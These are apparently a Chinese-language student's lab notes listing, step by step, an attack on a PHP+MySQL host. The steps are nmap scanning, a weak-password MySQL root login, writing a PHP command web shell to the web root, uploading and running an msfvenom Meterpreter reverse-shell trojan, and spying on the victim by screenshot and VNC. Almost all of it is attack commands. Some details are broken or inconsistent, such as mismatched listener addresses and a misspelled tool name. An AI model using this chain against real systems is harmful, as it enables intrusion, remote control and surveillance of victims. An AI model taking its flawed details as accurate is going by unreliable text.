網(wǎng)絡(luò)安全 mysql漏洞攻擊虛擬機(jī)測試
ifconfig//本機(jī)ip
nbtscan//掃描其他主機(jī)
nmap 192.168.0.9/24//掃描端口 檢測是否有3306端口
mysql -h 192.168.0.9 -u root -proot//弱密碼登錄mysql
select user();//查看用戶
show variables like "%secure%";//查看配置
192.168.0.7//打開網(wǎng)站(假如受害機(jī)正在使用php+mysql)
select "<?php @system($_GET['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/a.php"//創(chuàng)建文件到主機(jī),必須要存在運(yùn)行php網(wǎng)站的目錄下
192.168.0.7/a.php?cmd=whoami//打開當(dāng)當(dāng)創(chuàng)建好的文件,查看Windows權(quán)限
msfvenmom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.125 LPORT=8080 -f exe > shell.exe//創(chuàng)建木馬程序
//以下是相關(guān)配置
msfconsole
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 8080
exploit
復(fù)制shell.exe里面的內(nèi)容
192.168.0.7/a.php/?cmd =echo 粘貼內(nèi)容 -> C:\Users\Administrator\shell.exe//將木馬傳到受害機(jī)
192.168.0.7/a.php/?cmd =start C:\Users\Administrator\shell.exe//在受害機(jī)上打開木馬程序
screenshot //給受害機(jī)截屏
run vnc//查看受害機(jī)正在干什么